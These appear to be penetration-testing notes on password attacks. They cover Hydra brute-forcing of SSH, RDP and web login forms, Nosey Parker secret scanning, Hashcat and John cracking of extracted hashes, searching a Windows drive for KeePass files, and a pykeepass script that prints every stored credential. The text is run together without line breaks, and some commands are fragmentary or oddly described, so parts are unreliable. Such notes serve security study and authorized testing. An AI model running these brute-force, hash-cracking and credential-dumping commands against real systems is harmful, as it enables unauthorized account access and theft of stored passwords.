sudo hydra -l {username} -P {password_list} -s {port} ssh://{IP}sudo hydra -L {username_list} -p {password} rdp://{IP}sudo hydra -l {username} -P {password_list} {IP} http-post-form "/{endpoint}:{param1}=^PASS^:Login failed. Invalid"
sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.50.201 http-post-form "/index.php:user=admin&password=^PASS^:Login failed. Invalid"noseyparker scan {repo/directory}noseyparker scan --github-org={org}noseyparker reportdatastore.np before starting a new scanchmod 111 noseyparker before runninghashcat -r "$1 c $!" {password_list} will capitalize the first letter of each password, append “1” to the end of each password, and then append “!” to the end of that password
/usr/share/hashcat/rules/, like rockyou-30000
hashcat -m 0 {hash} {password_list} -r {modification_file} --forcehashcat -h | grep "{information}" can help find the number to userhashcat -m {number} --example-hash can provide a good example that hashcat can understandGet-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue will search for kdbx files (KeePass files) containing hasheskeepass2john {keepass_database_file} to extract hash
- Same goes for pdf2john, zip2john, or office2john
- We can then list the passwords like so:from pykeepass import PyKeePass
kp = PyKeePass('{db}.kdbx', password='{password}')
for entry in kp.entries:
print(f"Title: {entry.title}, Username: {entry.username}, Password: {entry.password}")
hashcat -m {hashcat_mode (e.g. 13400)} {hash} {wordlist} -r {mutation} --force
-O -w 4 --opencl-device-types 1,2hashcat -m 1410 '{password}:{salt}' {wordlist} to crack itssh2john {private RSA SSH key file} > ssh.hash will put the hash in a crack-able formathashcat -m 22921 ssh.hash {password_list} -r {mutation} --force will crack the SSH hash
hashcat --help responsejohn --wordlist={password_list} --rules=sshRules {hash} to crack$y$john {hashfile} --format=crypt --wordlist={wordlist_file}